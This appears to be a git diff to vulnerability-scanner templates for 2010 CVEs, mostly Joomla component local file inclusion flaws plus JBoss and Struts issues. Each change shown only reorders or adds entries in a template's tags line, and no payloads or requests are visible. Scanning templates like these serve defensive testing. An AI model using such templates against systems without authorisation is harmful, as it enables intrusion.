diff --git a/http/cves/2010/CVE-2010-0696.yaml b/http/cves/2010/CVE-2010-0696.yaml index 2102ec0059..009385fa4b 100644 --- a/http/cves/2010/CVE-2010-0696.yaml +++ b/http/cves/2010/CVE-2010-0696.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: joomlaworks product: jw_allvideos - tags: cve,cve2010,joomla,lfi,edb,joomlaworks + tags: cve2010,cve,joomla,lfi,edb,joomlaworks http: - method: GET diff --git a/http/cves/2010/CVE-2010-0942.yaml b/http/cves/2010/CVE-2010-0942.yaml index d8d2e8e160..43f42587bb 100644 --- a/http/cves/2010/CVE-2010-0942.yaml +++ b/http/cves/2010/CVE-2010-0942.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: jvideodirect product: com_jvideodirect - tags: cve2010,joomla,lfi,edb,packetstorm,cve,jvideodirect + tags: cve,cve2010,joomla,lfi,edb,packetstorm,jvideodirect http: - method: GET diff --git a/http/cves/2010/CVE-2010-0943.yaml b/http/cves/2010/CVE-2010-0943.yaml index e423797e96..e0bec5f437 100644 --- a/http/cves/2010/CVE-2010-0943.yaml +++ b/http/cves/2010/CVE-2010-0943.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: joomlart product: com_jashowcase - tags: cve2010,joomla,lfi,edb,cve,joomlart + tags: cve,cve2010,joomla,lfi,edb,joomlart http: - method: GET diff --git a/http/cves/2010/CVE-2010-0944.yaml b/http/cves/2010/CVE-2010-0944.yaml index b9411f790a..99c80222ec 100644 --- a/http/cves/2010/CVE-2010-0944.yaml +++ b/http/cves/2010/CVE-2010-0944.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: thorsten_riess product: com_jcollection - tags: cve2010,joomla,lfi,edb,packetstorm,cve,thorsten_riess + tags: cve2010,cve,joomla,lfi,edb,packetstorm,thorsten_riess http: - method: GET diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index af6e5f85dd..99094d5719 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: g4j.laoneo product: com_gcalendar - tags: edb,cve,cve2010,joomla,lfi + tags: cve2010,cve,edb,joomla,lfi,g4j.laoneo http: - method: GET diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index 16da120308..4cad3f2a75 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: joomlamo product: com_cartweberp - tags: cve,cve2010,joomla,lfi,edb,joomlamo + tags: cve2010,cve,joomla,lfi,edb,joomlamo http: - method: GET diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index e19aab2f21..a62fc10459 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: chris_simon product: com_abbrev - tags: cve,cve2010,joomla,lfi,edb + tags: cve,cve2010,joomla,lfi,edb,chris_simon http: - method: GET diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index 5bbe680253..1496cfa4f8 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: je_form_creator product: je_form_creator - tags: edb,packetstorm,cve,cve2010,joomla,lfi,plugin,je_form_creator + tags: cve,cve2010,edb,packetstorm,joomla,lfi,plugin,je_form_creator http: - method: GET diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index 07a22db236..db8f4a870e 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: decryptweb product: com_dwgraphs - tags: edb,cve,cve2010,joomla,lfi,graph,decryptweb + tags: cve,cve2010,edb,joomla,lfi,graph,decryptweb http: - method: GET diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index 4b1079360d..a4eb35d020 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: joomlamo product: com_userstatus - tags: cve2010,joomla,lfi,status,edb,cve,joomlamo + tags: cve,cve2010,joomla,lfi,status,edb,joomlamo http: - method: GET diff --git a/http/cves/2010/CVE-2010-1305.yaml b/http/cves/2010/CVE-2010-1305.yaml index 4b9c11b144..3ad7c72828 100644 --- a/http/cves/2010/CVE-2010-1305.yaml +++ b/http/cves/2010/CVE-2010-1305.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: joomlamo product: com_jinventory - tags: joomla,lfi,edb,cve,cve2010,joomlamo + tags: cve,cve2010,joomla,lfi,edb,joomlamo http: - method: GET diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 360c5c2c26..8451f2814f 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: software.realtyna product: com_joomlaupdater - tags: edb,cve,cve2010,joomla,lfi,software.realtyna + tags: cve,cve2010,edb,joomla,lfi,software.realtyna http: - method: GET diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index fb3b2be6e3..2de97fecba 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: ijoomla product: com_news_portal - tags: cve,cve2010,joomla,lfi,edb,packetstorm,ijoomla + tags: cve2010,cve,joomla,lfi,edb,packetstorm,ijoomla http: - method: GET diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index 6b7a0166ed..1e5da0b5e7 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: joomlanook product: com_hsconfig - tags: lfi,edb,packetstorm,cve,cve2010,joomla,joomlanook + tags: cve,cve2010,lfi,edb,packetstorm,joomla,joomlanook http: - method: GET diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index bc54569366..8c17bd50ac 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: joomla-research product: com_jresearch - tags: cve2010,joomla,lfi,edb,packetstorm,cve,joomla-research + tags: cve2010,cve,joomla,lfi,edb,packetstorm,joomla-research http: - method: GET diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index 50c58cc2fc..5aa011f473 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: cookex product: com_ckforms - tags: lfi,edb,cve,cve2010,joomla,cookex + tags: cve2010,cve,lfi,edb,joomla,cookex http: - method: GET diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 89fc3bed5a..252d03059f 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -30,7 +30,7 @@ info: vendor: redhat product: jboss_enterprise_application_platform shodan-query: title:"JBoss" - tags: cve,cve2010,jboss,eap,tomcat,exposure,redhat + tags: cve2010,cve,jboss,eap,tomcat,exposure,redhat http: - method: GET diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index f9902c7043..92f80f33a7 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: ternaria product: com_jprojectmanager - tags: lfi,edb,packetstorm,cve,cve2010,joomla,ternaria + tags: cve,cve2010,lfi,edb,packetstorm,joomla,ternaria http: - method: GET diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index 3dcaccf62e..a324c1dd2b 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: dev.pucit.edu.pk product: com_webtv - tags: cve2010,joomla,lfi,edb,cve,dev.pucit.edu.pk + tags: cve,cve2010,joomla,lfi,edb,dev.pucit.edu.pk http: - method: GET diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index e41af7fe09..83c4291e0c 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: johnmccollum product: com_advertising - tags: joomla,lfi,edb,packetstorm,cve,cve2010,johnmccollum + tags: cve2010,cve,joomla,lfi,edb,packetstorm,johnmccollum http: - method: GET diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index a14291eb9c..0a4d11ac87 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: supachai_teasakul product: com_sweetykeeper - tags: cve,cve2010,joomla,lfi,edb,supachai_teasakul + tags: cve2010,cve,joomla,lfi,edb,supachai_teasakul http: - method: GET diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index ff03ca3d3b..093505a471 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: ternaria product: com_preventive - tags: edb,cve,cve2010,joomla,lfi,ternaria + tags: cve,cve2010,edb,joomla,lfi,ternaria http: - method: GET diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 814bae2adc..093f4c2859 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: alphaplug product: com_alphauserpoints - tags: joomla,lfi,edb,packetstorm,cve,cve2010,alphaplug + tags: cve,cve2010,joomla,lfi,edb,packetstorm,alphaplug http: - method: GET diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index 7ee62cea87..510a72af22 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: mms.pipp product: com_mmsblog - tags: cve2010,joomla,lfi,edb,packetstorm,cve,mms.pipp + tags: cve,cve2010,joomla,lfi,edb,packetstorm,mms.pipp http: - method: GET diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index 94e5906378..8497107bdf 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: matamko product: com_matamko - tags: cve2010,joomla,lfi,edb,packetstorm,cve,matamko + tags: cve2010,cve,joomla,lfi,edb,packetstorm,matamko http: - method: GET diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index fbed245fbe..ac9063c570 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: redcomponent product: com_redshop - tags: lfi,edb,packetstorm,cve,cve2010,joomla,redcomponent + tags: cve2010,cve,lfi,edb,packetstorm,joomla,redcomponent http: - method: GET diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index 48855c5b76..74ad6d92e3 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: peter_hocherl product: com_tweetla - tags: cve2010,joomla,lfi,edb,cve,peter_hocherl + tags: cve2010,cve,joomla,lfi,edb,peter_hocherl http: - method: GET diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index b6947cdc5a..8eb565613c 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: joomla.batjo product: com_shoutbox - tags: joomla,lfi,edb,cve,cve2010,joomla.batjo + tags: cve2010,cve,joomla,lfi,edb,joomla.batjo http: - method: GET diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 34368ce661..3cb6e9ad64 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: peter_hocherl product: com_travelbook - tags: cve,cve2010,joomla,lfi,edb + tags: cve,cve2010,joomla,lfi,edb,peter_hocherl http: - method: GET diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index 4b8bb4fcc0..dc12659411 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: myblog product: com_myblog - tags: cve,cve2010,joomla,lfi,edb,myblog + tags: cve2010,cve,joomla,lfi,edb,myblog http: - method: GET diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index b816c6afbb..f805aa5e77 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: joomlamart product: com_jacomment - tags: cve2010,joomla,lfi,edb,packetstorm,cve,joomlamart + tags: cve,cve2010,joomla,lfi,edb,packetstorm,joomlamart http: - method: GET diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 58616861ae..cab5eb3673 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: zimbllc product: com_zimbcomment - tags: lfi,edb,packetstorm,cve,cve2010,joomla,zimbllc + tags: cve,cve2010,lfi,edb,packetstorm,joomla,zimbllc http: - method: GET diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index 35dedf0ded..1261663fd6 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: zimbllc product: com_zimbcore - tags: cve2010,joomla,lfi,edb,cve,zimbllc + tags: cve,cve2010,joomla,lfi,edb,zimbllc http: - method: GET diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 58c66e492b..9d41439bb2 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: htmlcoderhelper product: com_graphics - tags: edb,packetstorm,cve,cve2010,joomla,lfi,htmlcoderhelper + tags: cve,cve2010,edb,packetstorm,joomla,lfi,htmlcoderhelper http: - method: GET diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index 92ade001f1..5734df2dca 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: webkul product: com_ultimateportfolio - tags: cve2010,joomla,lfi,edb,cve,webkul + tags: cve2010,cve,joomla,lfi,edb,webkul http: - method: GET diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml index dcbb468c6a..c81c038657 100644 --- a/http/cves/2010/CVE-2010-1714.yaml +++ b/http/cves/2010/CVE-2010-1714.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: dev.pucit.edu.pk product: com_arcadegames - tags: cve,cve2010,joomla,lfi,edb,packetstorm,dev.pucit.edu.pk + tags: cve2010,cve,joomla,lfi,edb,packetstorm,dev.pucit.edu.pk http: - method: GET diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index 13f85de33e..5b1e4d3d57 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: pucit.edu product: com_onlineexam - tags: joomla,lfi,edb,packetstorm,cve,cve2010,pucit.edu + tags: cve,cve2010,joomla,lfi,edb,packetstorm,pucit.edu http: - method: GET diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index b7b8c9a375..34517db7ad 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -26,7 +26,7 @@ info: vendor: if_surfalert_project product: if_surfalert framework: joomla\! - tags: cve2010,joomla,lfi,edb,cve,if_surfalert_project,joomla\! + tags: cve,cve2010,joomla,lfi,edb,if_surfalert_project,joomla\! http: - method: GET diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index 0851ce5cd1..4786816e23 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: moto-treks product: com_mtfireeagle - tags: lfi,edb,cve,cve2010,joomla,moto-treks + tags: cve2010,cve,lfi,edb,joomla,moto-treks http: - method: GET diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index 09c267dabe..29ebb0cf88 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: gelembjuk product: com_smestorage - tags: cve2010,joomla,lfi,edb,packetstorm,cve,gelembjuk + tags: cve2010,cve,joomla,lfi,edb,packetstorm,gelembjuk http: - method: GET diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index 3bbf52e59f..c013c79fc7 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: apache product: struts - tags: packetstorm,edb,cve,cve2010,rce,listserv,ognl,apache + tags: cve,cve2010,packetstorm,edb,rce,listserv,ognl,apache http: - method: GET diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index 56261b336d..ce056889a1 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: com-property product: com_properties - tags: cve,cve2010,joomla,lfi,edb,com-property + tags: cve2010,cve,joomla,lfi,edb,com-property http: - method: GET diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index 62426ab49f..77a8b1dd61 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: blueflyingfish.no-ip product: com_orgchart - tags: lfi,edb,packetstorm,cve,cve2010,joomla,blueflyingfish.no-ip + tags: cve,cve2010,lfi,edb,packetstorm,joomla,blueflyingfish.no-ip http: - method: GET diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index 8c32ba2958..a1a33d4b45 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: joomlacomponent.inetlanka product: com_multimap - tags: cve2010,joomla,lfi,edb,cve,joomlacomponent.inetlanka + tags: cve,cve2010,joomla,lfi,edb,joomlacomponent.inetlanka http: - method: GET diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml index 56407a3b7c..29c94701e0 100644 --- a/http/cves/2010/CVE-2010-1954.yaml +++ b/http/cves/2010/CVE-2010-1954.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: joomlacomponent.inetlanka product: com_multiroot - tags: edb,cve,cve2010,joomla,lfi,joomlacomponent.inetlanka + tags: cve,cve2010,edb,joomla,lfi,joomlacomponent.inetlanka http: - method: GET diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index 9eb526f467..2d73e75cef 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: thefactory product: com_blogfactory - tags: lfi,edb,cve,cve2010,joomla,thefactory + tags: cve,cve2010,lfi,edb,joomla,thefactory http: - method: GET diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 1b512a94d8..0fec967930 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: thefactory product: com_gadgetfactory - tags: joomla,lfi,edb,cve,cve2010,thefactory + tags: cve,cve2010,joomla,lfi,edb,thefactory http: - method: GET diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index 0a9bca3a17..13a9a09852 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: thefactory product: com_lovefactory - tags: lfi,edb,packetstorm,cve,cve2010,joomla,thefactory + tags: cve,cve2010,lfi,edb,packetstorm,joomla,thefactory http: - method: GET diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index 184d1cd462..3366198b36 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: gohigheris product: com_jwhmcs - tags: edb,cve,cve2010,joomla,lfi,gohigheris + tags: cve2010,cve,edb,joomla,lfi,gohigheris http: - method: GET diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index c2e68854c0..63709744fd 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: affiliatefeeds product: com_datafeeds - tags: edb,cve,cve2010,joomla,lfi,affiliatefeeds + tags: cve,cve2010,edb,joomla,lfi,affiliatefeeds http: - method: GET diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml index 25c1b9eabf..93dde4a91c 100644 --- a/http/cves/2010/CVE-2010-1980.yaml +++ b/http/cves/2010/CVE-2010-1980.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: roberto_aloi product: com_joomlaflickr - tags: lfi,edb,packetstorm,cve,cve2010,joomla,roberto_aloi + tags: cve2010,cve,lfi,edb,packetstorm,joomla,roberto_aloi http: - method: GET diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index 44e3198e6f..7f6c150c8c 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: redcomponent product: com_redtwitter - tags: joomla,lfi,edb,packetstorm,cve,cve2010,redcomponent + tags: cve,cve2010,joomla,lfi,edb,packetstorm,redcomponent http: - method: GET diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index d417e287d9..f1f21952c5 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: percha product: com_perchacategoriestree - tags: packetstorm,cve,cve2010,joomla,lfi,percha + tags: cve,cve2010,packetstorm,joomla,lfi,percha http: - method: GET diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index 43e2ec117e..9dac4b1bdb 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: percha product: com_perchaimageattach - tags: edb,packetstorm,cve,cve2010,joomla,lfi,percha + tags: cve2010,cve,edb,packetstorm,joomla,lfi,percha http: - method: GET diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index 764f39ae1a..11dcd46c31 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: percha product: com_perchagallery - tags: packetstorm,cve,cve2010,joomla,lfi,edb,percha + tags: cve,cve2010,packetstorm,joomla,lfi,edb,percha http: - method: GET diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index d198971167..f14f6e1941 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: percha product: com_perchafieldsattach - tags: cve2010,lfi,joomla,edb,packetstorm,cve,percha + tags: cve,cve2010,lfi,joomla,edb,packetstorm,percha http: - method: GET diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index 2a84ad43d9..5031874204 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: percha product: com_perchadownloadsattach - tags: joomla,edb,packetstorm,cve,cve2010,lfi,percha + tags: cve2010,cve,joomla,edb,packetstorm,lfi,percha http: - method: GET diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 8f2d7df959..dc85155be2 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: m0r0n product: com_mscomment - tags: cve2010,joomla,lfi,edb,packetstorm,cve,m0r0n + tags: cve,cve2010,joomla,lfi,edb,packetstorm,m0r0n http: - method: GET diff --git a/http/cves/2010/CVE-2010-2122.yaml b/http/cves/2010/CVE-2010-2122.yaml index 833fba3283..365ef3e19e 100644 --- a/http/cves/2010/CVE-2010-2122.yaml +++ b/http/cves/2010/CVE-2010-2122.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: joelrowley product: com_simpledownload - tags: cve,cve2010,joomla,lfi,edb,joelrowley + tags: cve2010,cve,joomla,lfi,edb,joelrowley http: - method: GET diff --git a/http/cves/2010/CVE-2010-2259.yaml b/http/cves/2010/CVE-2010-2259.yaml index e5efbbbe3f..c25909cc34 100644 --- a/http/cves/2010/CVE-2010-2259.yaml +++ b/http/cves/2010/CVE-2010-2259.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: tamlyncreative product: com_bfsurvey_profree - tags: cve2010,joomla,lfi,edb,cve,tamlyncreative + tags: cve,cve2010,joomla,lfi,edb,tamlyncreative http: - method: GET diff --git a/http/cves/2010/CVE-2010-2307.yaml b/http/cves/2010/CVE-2010-2307.yaml index 636f1db8e8..74ba23ac05 100644 --- a/http/cves/2010/CVE-2010-2307.yaml +++ b/http/cves/2010/CVE-2010-2307.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: motorola product: surfboard_sbv6120e - tags: cve2010,iot,lfi,motorola,edb,cve + tags: cve2010,cve,iot,lfi,motorola,edb http: - method: GET diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index 155ed6a142..9b53a1b4f8 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: masselink product: com_picasa2gallery - tags: edb,packetstorm,cve,cve2010,joomla,lfi,masselink + tags: cve2010,cve,edb,packetstorm,joomla,lfi,masselink http: - method: GET diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index 5a2d269838..081d87076d 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: harmistechnology product: com_jesectionfinder - tags: cve,cve2010,joomla,lfi,edb,packetstorm,harmistechnology + tags: cve2010,cve,joomla,lfi,edb,packetstorm,harmistechnology http: - method: GET diff --git a/http/cves/2010/CVE-2010-2857.yaml b/http/cves/2010/CVE-2010-2857.yaml index f5d389cf57..8dce562bb0 100644 --- a/http/cves/2010/CVE-2010-2857.yaml +++ b/http/cves/2010/CVE-2010-2857.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: danieljamesscott product: com_music - tags: 